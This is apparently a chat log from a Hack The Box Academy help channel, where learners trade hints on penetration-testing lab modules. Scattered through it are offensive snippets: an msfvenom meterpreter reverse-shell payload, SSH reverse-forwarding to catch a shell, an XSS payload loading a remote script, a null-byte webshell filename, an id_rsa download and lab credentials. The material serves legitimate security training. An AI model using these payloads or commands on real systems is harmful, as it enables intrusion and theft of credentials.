what ip address? I should rdp to another network using the windows host as pivot no? netsh is telling the host to portforward to 172.16.5.19 no?!
Hey guys, I am trying to solve 'Attacking DNS' Lab from the Attacking common services lab
and I am stuck at the subbrute part
the subbrute.py command doesn't work?!
I have added the resolver (as per the module's description)
but it results in defaulting to the system's resolvers
I've added the ns1.inlanefreight.htb resolver only
You want to discover the zones?!
yeah
I have in my notes that I used the subbrute command...
well, I think it's pretty straightforward...
git clone https://github.com/TheRook/subbrute.git >> /dev/null 2>&1
cd subbrute
echo "ns1.inlanefreight.com" > ./resolvers.txt
./subbrute inlanefreight.com -s ./names.txt -r ./resolvers.txt
I've even added the -p flag that prints ANY DNS records in all found subdomains
what error you get?!
No nameservers found, trying fallback list.
It's been a while since I did this one. I don't remember doing anything special
try another vpn server maybe...
@arctic sentinel yes
I was given a hint of using a simple remote connection... it's done!
Ok
https://academy.hackthebox.com/module/158/section/1427
I'm trying to do this academy section on reverse port forwarding, but I am stuck at the point where you have to run the ssh -R command to get the pivot bounce back traffic from the windows target machine on to my kali box which has a reverse shell listening on port 8000. Here's the diagram I have created of what I am trying to achieve:
ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@172.16.5.19 -vN
This command when I try run on my kali box shows the following error:
Would someone know what's causing this not to work?
Fails even with the proxychains command
are you sure the target has port 22 open?
yes I have nmapped the windows target and it's open
from the error message seems otherwise
Another point to note, I can ping the pivot machine's 10.129.x.x. IP, but I cannot ping its "Internal" IP of 172.16.5.129 and neither that of windows target machine on 172.16.5.19
I have transferred the payload from kali box to pivot------------> Pivot to windows target machine as I served a python server and RDP into the windows target from where I pulled the file from the middle box, the pivot. I have run the payload script manually on the windows machine as well as administrator.
what's your kali tun0 IP
I had created the initial ssh dynamic port forwarding with the pivot box by the following command:
ssh -D 9050 ubuntu@10.129.x.x
nvm
10.10.15.140
Pivot's IP 10.129.110.212 and its internal IP 172.16.5.129. Windows target Ip 172.16.5.19
I can ping the pivot's 10.129.x.x IP, but cannot ping the other two internal IPs
port 22 is not opened on .5.19
Hey all, looking for a nudge with Password Attacks; Credential Hunting in Linux. I can't seem to figure out what to do and what the hints suggest
Have you got access to the course content? If you have then would you please check how reverse port forwarding will work as I can't get it to work from this point onwards.
Hmmm strange, not sure how they got it to work on the course material
ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@172.16.5.19 -vN
also, from what I can see in the exercises (questions) below you are not asked to get a rev shell on the windows internal target
According to the command not sure why it's sshing into windows target and ubuntu user doesn't make sense
the logs below are showing what happens after you execute the payload
I set up OpenVas on my Kali yesterday, but I missed, that you have to note down credentials. I tried to reset the admin-password, but it didn't work. What do you recommend me to do?
It fails on port 22 and doesn't generate any logs
ssh into the pivot host instead of the windows box
tried swapping IPs too
what's your command
ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@172.16.5.19 -vN
On top of that, if you carefully follow the instructions you will get a reverse shell, you must understand what to write as an IP address for the -R command
Again, the 5.19 host does not have port 22 open
that's the windows box you're sshing into..
Followed the command syntax as shown
Hey, can someone help? I'm on the Password Attacks module, for user Sam on SSH; found FTP, tried brute force on both but nothing returned
Please
The syntax is not using the internal IP address of the windows target
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
And still, doesn't mention the windows internal host
that's the question: Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam". Once successful, log in and submit the contents of the flag.txt file as your answer.
it might help if you look at the command like this
I'm working through Attacking Enterprise Networks/Internal Information Gathering. I'm trying to do the SSH pivot. I've done it before on other machines, but I can't seem to get it to work on this lab. I'm following the steps. I first did ssh -D 8081 -i dmz01_key root@10.129.203.111, but the next step in the section is to do netstat to verify that ssh is listening on that port, but I get docker-proxy. So I change it to 9050, but netstat doesn't give me anything on that port. When I try the next step of proxychains nmap, it doesn't work. Any thoughts?
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
It worked, I changed IPs and used both pivot IPs
ssh -R 172.16.5.19:8080:0.0.0.0:8000 ubuntu@172.16.5.129 -vN
Thanks I need to open my eyes and understand what's the syntax saying !
@dim wolf Thanks for helping
run the payload and make sure it actually works
Repost:
Hey all, looking for a nudge with Password Attacks; Credential Hunting in Linux. I can't seem to figure out what to do and what the hints suggest
It's not getting the reverse shell, although now it's showing the logs on kali box and reverse port forwarding is working. Not sure what's wrong now.
Am I the only one who struggles with Windows PrivEsc Skill Assessment I ?
Got RevShell through command injection, but nothing works (tried winpeas, wes, powerup; and all the associated methods and CVE)
I tried Windows PrivEsc Skill Assessment II and solved all in 20min ... someone has a hint ?
damn this new thick applications section though
have you checked the hint
Yes I bruteforced all running services with both usernames. The one in description and the one in the hint. Also tried using the hint given password
Think I am missing a high level view of what the task wants from me
you need to mutate it
@autumn pilot Any insight into why reverse shell is not spawning now as reverse port forwarding is working. Possibly the payload? Not sure
payload
Generated the payload using the following command:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080
of course changed the IP to 172.16.5.129
you need to specify it in the console as well
I did run that in my Kali terminal and it generated the backupscript.exe file
anyone finish the new Attacking Thick Client Applications? I understood up until the memory maps section
keep getting a "The file isn't a .NET PE file"
Sorry didn't get this bit, what do you mean run in the console?
think
I'm not going to give you the answer, as it is already explained somewhere, and is not hard to get to it
Got it, thanks
I got it, but not sure why this worked...so if someone understands memory maps and could explain, my dms are open to you
hi, can I dm you? I am stuck at this module
Hi there, can XXEinjector execute the error-based method?
Could someone give me a hint?
unfortunately, I'm not really qualified to help on that section. The only way I could help is by giving the answer which I don't see as beneficial. All I'll say is look at the pictures and reread and you'll be able to tell what to dump. Once I get an explanation and actually understand what's going on I'll be able to help you
One such tool is XXEinjector. This tool supports most of the tricks we learned in this module, including basic XXE, CDATA source exfiltration, error-based XXE, and blind OOB XXE. - From the Automated OOB Exfiltration section. so to answer your question, yes it can be used for error-based XXE
Anyone able to help with the Broken Authentication module - predictable reset token question 1? I feel like I've tried everything at this point and I can't even seem to recreate the generated hash for htbuser.
are you asking how -dump works?
anyone knows why on ATTACKING ENTERPRISE NETWORKS Lateral Movement I receive the following error when trying to escalate privileges?
C:\Windows\system32>ο»Ώnet localgroup administrators ilfserveradm /add
'ο»Ώnet' is not recognized as an internal or external command,
operable program or batch file.
oh, I fail in the error based and CDATA.. I will study it again. Thanks!
what section is this?
that's the module, what section are you in
look at the right hand side, the Table of Contents.. what section are you asking about.
you do need the --dump flag if you want to "dump" the content of a specific table.
Hello guys!
One thing in the Vulnerability Assessment module > Nessus Skills Assessment the question " What were the targets for the authentication scan ?" Where exactly I need to see, like I answered all the other questions about nessus, this one is the last one and I cannot understand where I need to see to get the answer!
if you look at the scans what is the host. ||It's looking for the IP address of the target scanned||
After two days of trying I have finally got the rev shell on my kali box. Learnt a ton during all this, more about myself
: | I literally tried everything because I thought that answer was too obvious to be the real answer.
I guess I need to use the philosophy of keep things simple.
Thank you!
@rustic sage
it basically asks you what was the target(s) that have been scanned
How do I be a hacker?
Getting frustrated everyday on a problem that seems impossible to solve but then solving it is my strat
On host #1 of the Live Engagement for Reverse Shells and Payloads - ||Does anybody know what the second vulnerability is on host1? The hint says "This host has two upload vulnerabilities.", I found and exploited the one using apache tomcat successfully (port 8080), but on port 80 is there a separate one that I am missing?||
Did the "Attacking Common Applications" module grow overnight? I thought I was finished with it!
Yep~ But if it was already done, you probably don't have to redo it to start the cpts exam. I just started the exam this morning w/o doing the new content
11 new sections including a new skill assessment, good luck on the thick applications part
I just finished the Skills Assessment III. That was easy. @rustic sage if I have issues with that, can I ping you?
GL, @steady totem
I can somewhat help with Attacking Thick Client Applications, I'm still struggling with Exploiting Web Vulnerabilities in Thick-Client Applications though
I should get to that later today. I'll look for you then.
Hey friend !!!
i'm stuck here
Password Attack Lab -Medium
Examine the second target and submit the contents of flag.txt in /root/ as the answer.
||I'm in the jason user, don't know further, for dennis and root access||, ||I suppose I should look at the services but I don't know what to do||...HELP!
maybe there is a hint in that document you download
there's a certain cycle of mentality you should get into for these things. Once you've elevated access you should think "What can I plunder?" look for creds, secrets, etc. then go to enumeration of, "what can I access that I couldn't before, what can this user use that I couldn't earlier?"
but have a plunder-first mentality
and this is a general tip, not just for that skill assessment
ok
I ran a full 94.000 list on the Will user and the Kira user :<
You don't need a 94,000 words wordlist
That was the mutated one from the previous module :<
Can i DM you too?
Can I dm someone regarding a hint of the LFI Skill assessment?
Was able to get the source code of index, but I'm stuck with the RCE.
Something might have clicked. Maybe mutating the one given password is an option
anyone has been able to submit the uname value as the answer for the new thick client stuff?
I need help for SMB, footprinting module. For the third question: "Connect to the discovered share and find the flag.txt file. Submit the contents as the answer".
I found flag.txt and opened it and got the flag but when I submit it, HTB said it was wrong. Did I misunderstand the question?
probably an errant space
you can dm me
tbh I think thick client could've and should've been its own module, that was a lot
In Broken Authentication - Brute Forcing Cookies I was able to get the answer to the second question with the help of Cyberchef's Magic functionality. I was able to determine the first two encoding methods by looking at them, but for the last one I'm not sure how I could've identified it. Would someone be able to explain to me how to identify the last encoding method manually please? I tried magic numbers, but I couldn't find any that match
I can't get any entry with "Credential Hunting in Linux", been using the mutated password of Kira with the ftp and ssh service, to no avail. Anybody who can assist?
hello, when I try to connect to the xfreerdp server for this module (Packet Inception, Dissecting Network Traffic With Wireshark) I get (bash: xfreerdp: command not found). Any solution?
I made a mistake
install xfreerdp
ok
Hello,
I'm doing the SQLi Fundamentals module, I'm doing the exercise for this section Subverting Query Logic.
I'm able to login, I already have the passwords for all users, but I'm unable to find the flag.
some help will be appreciated.
Thanks
Try to log in as the user 'tom'. What is the flag value shown after you successfully log in?
Anyone around for a question on the Shells & Payloads skill assessment?
https://www.infosecarticles.com/exploiting-shellshock-vulnerability/. So I'm trying to wrap my head around the ShellShock vulnerability in Unix systems (CVE-2014-6271). I MOSTLY understand the mechanics behind it. The linked article mentions the following:
```
The User-Agent value used in curl is stored as an environment variable on the remote machine. By default, this is set to HTTP_USER_AGENT = curl/7.47.0 when using curl. However, this value can be modified. We can store malicious code that sets up a reverse shell inside this environment variable.
```
it's a weird way they wrote it, it has nothing to do with curl
the vuln is how the server is passing the user agent header from clients. curl has a default user agent that you can set, but whatever client you use so long as you put it in the user agent is good enough.
for this particular scenario at least
plenty of shellshock vuln systems have nothing to do with user agents
Yep, something obvious
@thorn urchin So do ALL servers store the User-Agent value in the environment? Seems kinda strange. I looked for explicit answers to this on google but none of the answers make sense.
can you talk on this server and if so how
no, you've completely misread it (cause it's written badly)
this exploit has nothing to do with environment variables
also just realized this is the modules channel, which is off topic
can somebody please answer me
read the channels
this channel is for module discussion, not newbies first discord how to
@thorn urchin The question stems from "Attacking Common Gateway Interface (CGI) Applications - Shellshock" in the Module "Attacking Common Applications". It mentions environment variables as the means through which this exploit can be achieved. I'll do some more research on it. Thank you for your responses.
Can someone help me with https://academy.hackthebox.com/module/143/section/1279 obtain credentials for CT059???
Inveigh.exe and Inveigh.ps1 not working at all
ok good. and yeah the sticker with shellshock was how many different possible avenues of exploitation there are. in the link provided the env variables are not relevant, it's just telling you where your curl client gets its default user agent from.
AAAHH I see
well inveigh is the way, so either the ones you're using are wrong, you're using the tool wrong, or you're using it on the wrong box.
Okey so spawn this machine and try it out :))
I've already completed the module and looked at my assessment notes :))
well I reiterate the conditions I said above
sure
would anyone be able to assist me in XSS session hi-jacking section?
been stuck for a day. I can't seem to find the correct payload.
ATTACKING COMMON SERVICES Attacking SMB
Login as the user "jason" via SSH and find the flag.txt file. Submit the contents as your answer
I found the password for jason but can't login to SSH
Can someone give me a hint
"><script src=http://URL:Port/script.js/></script>
And then the script.js and index.php from before
Hmmm. Still having a hard time. I did both username, and fullname fields
bit of a spoiler there
smbclient -U jason -L ////10.129.254.186//GGJ
Enter WORKGROUP\jason's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
GGJ Disk Priv
IPC$ IPC IPC Service (attcsvc-linux Samba)
SMB1 disabled -- no workgroup available
Does someone know how to get around this SMB1 disabled
SRY
To be fair, I for some reason thought the text said to only test the username and fullname field. I was throwing payloads at it for the past day. Definitely a noob moment for not even trying the other fields
we've all had those
I do appreciate the nudge. I was getting frustrated
as for this, it does say to SSH. BUUUT I think there are other tools that have support for smb2 that could also grab that flag
i need to get that id_rsa from the smb right?
it's been a while since I've done that specific module, I can't remember if there was an id_rsa. if there is then yes. if not then there should be a way using cme, which I used to grab the flag
The Share GGJ is READ ONLY
In the Network Enumeration with Nmap Academy module in the Host Discovery section, the question is what operating system the machine in question is running. I guessed it to be ||Windows|| and I was right, I guessed that based off of ||[ttl=128 id=40622 iplen=28 ]|| with the ||ttl||. Is that the way I was supposed to know it or was there something else that I should have paid attention to? I guessed right the first time but what bothers me is that I guessed and didn't know
thats fine if its read only
scoop up any useful bits from it
Plunder -> Enum -> Exploit
If you do packet tracing it will tell you in some of the packets
|| Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 00:12 CEST
SENT (0.0107s) ICMP [10.10.14.2 > 10.129.2.18 Echo request (type=8/code=0) id=13607 seq=0] IP [ttl=255 id=23541 iplen=28 ]
RCVD (0.0152s) ICMP [10.129.2.18 > 10.10.14.2 Echo reply (type=0/code=0) id=13607 seq=0] IP [ttl=128 id=40622 iplen=28 ]
Nmap scan report for 10.129.2.18
Host is up (0.086s latency).
MAC Address: DE:AD:00:00:BE:EF
Nmap done: 1 IP address (1 host up) scanned in 0.11 seconds || was the entire response
|| sudo nmap 10.129.2.18 -sn -oA host -PE --packet-trace --disable-arp-ping || was the prompt
where does it tell me?
I didn't actually do this scan, the input and output is given in the module
There should be?
Ah yeah that part
weird, I don't remember that, but in such case yeah the ttl is how you were supposed to know
RCVD ttl
so with the read only I can't download them
Yeah that's how I guessed it in the first place, but I wasn't sure that it was the way I was actually supposed to solve it in this case, so I asked just to make sure ^^
read only definitely gives you download access
how are you trying to download the files
TTL is a timer value included in packets sent over TCP/IP-based networks that tells the recipients h
smbmap -H 10.129.254.186 --download "GGJ/id_rsa"
it might be funky but at least you could copy and paste the output into a text file
Thank you, I'll bookmark that for further reference. Cheers
if you just google "how to determine OS from TTL" it should give you a handful of things that have these types of tables
I've not used smbmap for this. use smbclient normally and see if that file is even there
^
not to say smbmap can't work, but I'm not familiar with it enough to know if your usage is correct
worked with user and password, dumb of me
can I get some help with footprinting, I don't get this question: What is the "FQDN of the host where the last octet ends with "x.x.x.203"?" I use dnsenum --dnsserver 10.129.42.x --enum -p 0 -s 0 -o subdomains.txt -f /home/kali/Desktop/SecLists/Discovery/DNS/combined_subdomains.txt --threads 90 inlanefreight.htb
you need to find/enumerate all the zones
You can dig it;)
you can dm me for another hint
yea I already found the internal
what about second internal
I'm working with curl and the http methods and the question is "First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag." I did all of that and searched for the city and as a response I just get this
How do people who are in top 100 learn?
Surely they don't go right into it with infinite knowledge
Hi Guys, I'm getting an error when running the tomcat mgr in metasploit where it says that failed to deploy the payload.
I'm using java/reverse_shell_tcp
i'm currently in the Live engagement of shells and payload module
Not sure about in that module - but they used a different payload in Attacking Common Applications - Attacking Tomcat that's probably worth noting
maybe. Idk if that'll solve it or not for you
Hi guys! hope yall are doing well!
I'm stuck at the Password Attacks - Password Mutations module, I found another user besides the one provided and its password, but all it gave me was access to an empty SMB directory, can someone give me some pointers?
I tried access through RPC, NFS, tried to use the same user in other available services with the mutated password list, tried to use the same password with the wordlist of usernames. Nothing worked, I'm kinda lost. Also, sorry if I misspelled something, english is not my native language.
Thank you!
I'm using the tomcat manager authenticated upload in metasploit but getting the error of failed to deploy payload
exploit/multi/http/tomcat_mgr_upload
I'm also using the correct credentials
yes. I'm saying maybe you should try a different payload...
Hello! I'm stuck on "Network Enumeration with Nmap - Nmap Scripting Engine". I've enumerated all ports and ran the 'http-enum' script. "||sudo nmap -p- --script http-enum 10.129.162.102 --stats-every=60s||"
found a robots.txt on port 80, which looks like it has the flag in it, but it won't work when I input it on the site. Any help?
dm
Okay, I need some help with the Attacking Thick Client Applications module. So I'm on the memory map part. Using x64dbg I got to the banner. In the instructions it says that "there should be an interesting new map added after the ASCII banner is being displayed". The next step is to import the mapped item from memory. So I've dumped literally every single MAP type in the memory map and ran strings and de4dot on them all and none of them are .NET executables... has anyone been able to solve this one? I'm totally stumped.
Hello, I'm doing the File Uploads module, I'm in the whitelist filters lesson. I put a web shell with shell.php\x00.gif but I cannot access it, can somebody help me?
that extension could be a false-positive
and how can I try it?
hi, in the LF module, the problem child: I understand "dpkg -l | grep" but once I use "-c '^ii'" I don't understand that one. I get checking the history with "-c" but don't understand the next part of the bash script
also the question is to find how many total packages are installed on the target system
What module are you on?
Anyone fixed this issue for Oracle TNS
sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory.
solution here
https://stackoverflow.com/questions/27717312/sqlplus-error-while-loading-shared-libraries-libsqlplus-so-cannot-open-shared
Please suggest a solution for solving this issue?? While giving the command:
sqlplus /nolog
the error that occurred:
sqlplus: error while loading shared libraries:
libsqlplus.so: cannot open s...
creating the oracle.sh file:
/etc/profile.d/oracle.sh
ORACLE_HOME=/usr/lib/oracle/19.6/client64/lib
PATH=$ORACLE_HOME/bin:$PATH
LD_LIBRARY_PATH=$ORACLE_HOME/lib
export ORACLE_HOME
export LD_LIBRARY_PATH
export PATH
run this command:
source /etc/profile.d/oracle.sh
and this command:
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib:$ORACLE_HOME
The section "Attacking Thick Client Applications" from "Attacking Common Applications" requires knowledge of reverse engineering, which was never taught before... How do I get through this? Where can I learn all the tools presented there? I got lost...
And also, it is impossible to start PS once inheritance is removed... I had to re-enable it for PS to work - but then it deletes the file after one x64dbg run. Really frustrating
Considering doing the course and was hoping to hear from others, have any of you guys tried this course and have any advice? Reviews?
I'm doing Getting Started => Public Exploits: Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start) and when I use msf I get this message (requires mod_cgi to be enabled)?
Recently I passed the CPTS exam by HackTheBox. In this video I discuss my experience with the course and exam, as well as how it differs from the OSCP.
HTB Discord: https://discord.com/invite/hackthebox
Chapters:
0:00 Introduction
0:29 The Course
3:35 The Exam
5:38 The Report
8:11 Tips & Tricks
11:46 FAQ: How does CPTS compare to OSCP?
18:55 O...
In this video I will share my experience with the CBBH course and exam, as well as some tips I have for people who may be interested in taking it.
Chapters:
0:00 Introduction
0:19 Course: Format & Content
2:31 Course: Duration
3:05 Course: Pwnbox
3:33 Course: Pricing
4:22 Exam: Format & Content
5:09 Exam: Duration
5:59 Exam: Report
7:49 Exam: F...
My review of the new @HackTheBox Certified Penetration Testing Specialist (CPTS) certification - Hope you enjoy #HackTheBox #HTB #CTF #Pentesting #OffSec #CPTS #Certification #Course
Social Media:
Twitter: https://twitter.com/_CryptoCat
GitHub: https://github.com/Crypto-Cat
HackTheBox: https://app.hackthebox.eu/profile/11897
LinkedIn: https:...
Has someone finished the updated bloodhound skill assessment?
yes, where are you stuck?
Last question to be fair, can't visualise how to build the Cypher query to return a number, as the one I currently have is incorrect
For this question you need to work directly in the Neo4j browser
http://localhost:7474/browser/
yeah, I'm aware, however the parameters(queries) are the things that I'm facing an issue with
You can send me a DM
Hey guys, just working on the Intro to Bash module and already stuck at the first task haha, is the module enough for me to understand this and be able to replicate it or what? How should I approach it? I am new to scripting so limited experience
Does anyone else have connectivity issues with the Pivoting, Tunneling, and Port Forwarding Skills Assessment?
Hi,
I'm stuck on Attacking Common Applications in the Tomcat section at the question "What role does the admin user have in the configuration example?"
there should not be great complexity but I don't know what I should look for.
in the configuration example above, what role does the admin user have. I don't see the complexity?
you're learning something new, it's always going to come with ups and downs! just keep at it and practice, you can also watch some videos to help! I will say I love bash scripting because I've automated a lot of my setup process, so if I ever have to change VMs all my tools will be there
Well, there are several pages of examples and I don't understand what they are asking me.
As I said, it's probably very stupid but I don't know where I should look
it's one page... and it only shows one configuration file where it lists users and their roles?
Ok lol I have it!
I was looking for an answer on the website ...
read the questions carefully, it says in the example.
Thanks mate yeah I've committed myself to learning the basics of bash, python and PS
Yes but just before we are asked the version of Tomcat on a website so I did not understand the question which yes was evident.
Thanks for your reply.
fair, they'll sometimes do that. just keep in mind whenever they say "example" it usually refers back to what you just read
anyone know if there has been a fix for Exploiting Web Vulnerabilities in Thick-Client Applications? It's the only section I have left
I am doing Attacking Common Applications - Attacking WordPress and found the flag in the webroot, or so I think, but it's not taking it. I have no spaces or anything. Is someone there that can validate that I have the right flag?
you can dm me
I need someone to get into an account for me
I don't think so, the hostname rotates every reboot. It doesn't take my flag, but it's different every time
Anyone willing to do so?
were you able to do the previous one, Attacking Thick Client Applications? I couldn't get the memory dump to work
this is not the place to ask this.. please read #rules
Ok
yes I'm aware... as for Attacking Thick Client Applications I did solve it, but I'm still looking for an explanation on that.. I'm not really qualified to help and the only assistance I can provide is the answer which isn't helpful.
I was thinking of trying to open the exe in Ghidra, but that seemed like a rabbit hole
so the steps did work for you in the section?
I wasn't sure if there was something missing, or if I was missing something
yes just reread and look at the images and you should be set! I'm waiting for an explanation before I offer more assistance into that part of the lab
ok, I'll revisit it. I was staring at the asm until I was cross eyed
I am using crackmapexec and the brute force attack stops after one iteration. I tried a null session to smbclient but it doesn't allow it. I am using users.list and pws.list. Am I doing something wrong?
||take a look at SMB again||
Hi, in the SQLMap Essentials module, Running SQLMap on an HTTP Request section, I'm trying to answer the second question, what are the contents of table flag3? (case #3 - cookie id)
When executing the command sqlmap -u 'URL' --cookie='id=1',
sqlmap gives me an error that the parameters were not found, any ideas?
I don't remember exactly, but try putting a * by the 1. If that doesn't work I'll try spawning up the lab again.
that was what I needed, ty
Yes, finally completed the LFI skill assessment. If anybody needs a hint, let me know.
very helpful and worth looking into
Hi
I'm stuck on Attacking Tomcat for "find and submit the contents of tomcat_flag.txt"
Impossible to find where this flag is!
it's not "impossible"
what have you tried / where are you failing / do you know why it isn't working? ||pretty sure for this one you just exploit the built-in functionality as taught in the section||
Well yes I have a webshell having uploaded a .war file
I have access to the root folder.
I'm going through all the folders.
The find command goes around in circles without giving me anything.
I don't understand the subtlety to find this flag.
I don't remember where the flag actually is, so if you have a web shell go searching. I can tell you it's not impossible as I have solved it.
can anyone help? I am at Footprinting medium, I am in the database but I can't find any HTB users
Request for Help. Module: Footprinting - MySQL
Q: During our penetration test, we found weak credentials "robin:robin". We should try these against the MySQL server. What is the email address of the customer "Otto Lang"?
I enumerated the MySQL service and was able to get a dump of names and email addresses -- HTB isn't taking the email as the appropriate answer?? Not sure if I'm screwing up something in MySQL or if there's an error with HTB.
if you want to dm me with your find command I'll check it out
excuse me, I am a noob with Discord. How can I upload a picture? I have a question to ask. TK
||Look for a non-standard database, once you find that look through the tables.||
hi @rustic sage I have sent you something in your DM
you need to verify your account #welcome before being able to
are you sure you have the correct email? ||Don't dump all email addresses, search for the customer where it is "Otto Lang"||
I know you have those 4 standard databases but the rest does not contain anything useful
I just refined my MySQL query to dump only the record for "Otto Lang" and it's the same email. HTB isn't taking it as the correct email.
any leading or trailing whitespaces?
there should be one non standard database that you should look into.
I literally just did that as you were typing and it might have been the issue. Lol. Thx.
is it the A******* one?
that would be the non standard one. do some digging now
@rustic sage this is the output i got for 445 smb
Thank you so much!
enumerate the service
Hello! I have a problem with academy-regular.ovpn. I tried to find a solution on Discord and Google, but I failed. It took me a really long time and drove me CRAZY! Can someone tell me what it is and how to fix it? I've already asked in 'community-help' and a friendly guy helped me. However, I can't solve it. I spent 2 days on it. Can someone give a hand please? Thanks in advance.
I have some problems in the Shells & Payloads module
try re downloading the ovpn file. you can also read https://help.hackthebox.com/en/articles/5185536-connection-troubleshooting
VPN issues? Slow connections? Can't reach machines? Start here!
Hi all, I don't understand anything in the new section Attacking Thick Client Applications added to the Attacking Common Applications module... the x64dbg screenshots are anything but accurate and I don't understand what the creator is referring to. Any help?
the screenshots are actually more than enough, imo it's just not explained well.. making it harder for people that don't have a reversing background
if you have a question that's not on memory maps I can try and help. haven't done reversing in a while, but I understand the basics. the only part I had trouble with was that memory maps portion
totally agree
would be awesome, please xD
you can dm! I'm working though so my responses may be delayed
it would have been nice to have taken into account the background in reversing before publishing the section imo
HTB - CMRE : HTB Certified Malware Reverse Engineer - coming to an academy near you soon
I don't work for HTB don't take that seriously
Can anyone assist a bit with the Attacking Common Applications updated module
what section
Attacking Thick Client Applications
I can help on anything but memory maps. I solved it, but I'm not really sure how to explain that section without giving the answer.
I'm stuck on host 2 of the module. Any advice?
hello, I had a question, I got stuck on the last question in the SMB section of the host-based numbering section in the penetration test section, can anyone help?
Exploit the target using what you've learned in this section, then submit the name of the file located in htb-student's Documents folder. (Format: filename.extension) cd and search commands don't work
Also @somber parcel https://dontasktoask.com just ask your question unless it spoils the module and gives too much info away
Can you elaborate on
Module:
Section:
module: shell and payloads Section: Automating Payloads & Delivery with Metasploit
And you dropped into the shell?
Yeah, I'm in it now
Just to be clear, after your payload has been run/session initiated, you typed shell in the msf command line
:)
Hi guys
Module: Shells and Payloads, Section: Live Engagement, Machine 2
I'd suggest reading #welcome and looking up "hack the box beginners bible"
This channel is for conversation and assistance with the modules found on https://academy.hackthebox.com
Can we join little bit on discord?
What are you having issues with, have you tried
the find command doesn't work
Is there anyone who has completed shells and payloads that I can message? I'm stuck on the second machine of the live engagement and have completed everything else
last question in this section, I am missing something or I am writing it wrong. I have learned a lot, I need a hint or an answer
Which part are you stuck with?
Can I PM to avoid spoilers?
Sure
Just go to the documents folder and dir
Anyone for the "HTTP Attacks" module and response splitting?
i got it
such a dumb thing to be stuck on, but can someone help w/ Attacking GitLab in Attacking Common Applications? I have tried all lists suggested by the hint and found 7 users, but none of them are correct?
you need to use the right wordlist because the answer is case sensitive... if you DM me with the correct username I will tell you how it's properly submitted. I spent longer than I'd like to admit on this section as well..
soon as I ask it works, thanks @rustic sage
use the commands you learned and google OS flavor or something
lol
Still
i got it
Guys
on every site I try to enter
it gives me this
free users don't have internet
oh, thanks
Module "ABUSING HTTP MISCONFIGURATIONS", "Common Session Variables (Account Takeover)" Section. After following the exploitation procedure, I'm faced with a MFA form. I could use some help in bypassing it. I'll share what I have done.
Has anyone done Corporate OSINT?
From the OSINT module? Yes. Where are you stuck?
hello, I'm stuck on this question, can you help me? (What are the client and server port numbers used in the first full TCP three-way handshake?)
Are the modules in the pen-tester job path written in order? Would you guys recommend doing AD Enumeration before Windows privesc?
if you're doing CPTS definitely do the modules in order
Ok, thank you
there are some modules that will presume you have done earlier ones, and then some modules won't make a single reference to an earlier module but are 10x easier to complete by applying the earlier information without being prompted to do so.
Thanks for the information. I would mainly like to improve my Windows skills, they are severely lacking compared to my Linux / web app skills.
Does anyone know how to perform actions on an SMB share with authentication? The SMB share is hosted on a Linux system. I have to be authenticated because of the Group Policy
if you're just trying to upgrade Windows skills and not doing CPTS then yeah, do Windows AD and then Windows priv esc. If you're not already familiar with pivoting and tunnels, then do the pivoting module before AD or else you'll hate yourself on the assessment
I'll start on the pivoting module then.
Hi. Someone who can lend a hand on this?
it's a garbage tier addition that's basically a broken rough draft. Complain about it to #858470491676737536 and support.
it's literally the lowest quality piece of content I've seen in the entire academy
Anyone able to help me with sqlmap essentials
dm me
anyone else having connection issues? the target spawned is not connecting at all; changed vpn settings multiple times.
Me too. I need only this section to complete the CPTS path and I cannot finish it because of this -.-
what do you need help with?
idk finding the flag
what module
Yes, this one
did you look at the hint?
sqsh -S 10.129.170.144 -U .\htbdbuser -P 'MSSQLAccess01!' -h
sqsh-3.0 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
Open Client Message
Layer 6, Origin 8, Severity 5, Number 3
ct_connect(): directory service layer: internal directory control layer error: Requested server name not found.
Can someone explain to me why I can't connect to the MSSQL Server
also re-read the section for HTTP Authorization Header for that
Can I share screen to you?
did you try using mssqlclient.py? currently at the same place but the target is not connecting at all
sqsh is just broken use mssqlclient.py
Re-read the HTTP Authorization Header section and look at the hint
Hi,
Where can I get help for Machine "Soccer"? I am a bit lost in the discord
I don't understand, maybe I can share screen to you and show me?
aint nobody wanna share screen
use your words lol
Nah, I share screen not him
I know what you said
Good for you then if you understood
people generally still don't want to watch a screen share. Describe the problem you're having and provide details and reasoning behind your issue
I understand, but maybe he wants, who knows
Active Directory Enumeration & Attack - Assessment Part II - Need a nudge on finding the hash for CT059! I tried Responder poisoning, LaZagne, dumping lsass and SAM with mimikatz. I ran out of ideas.
check dm, i've sent you the sections you should re-read
Is JavaScript a good language to write malware in?
|| inveigh|| is your friend
Thank you!
line wrapping?
Hi, I am working on the DNS module, I am on the last one looking for the FQDN with .203, I have run the for command with all the SecLists (at least I believe I have) but I still have not seen this host. Not looking for the answer, just a hint or two, or at least make sure I am on the right track. I thank you!
you need to find/enumerate all the zones
anyone available who has completed the attacking common services module?
I'm working on the Attacking SQL Databases section and I'm confused by the fact that I am not seeing any SQL services running.
nm my vpn dropped.
now it won't accept the username and password.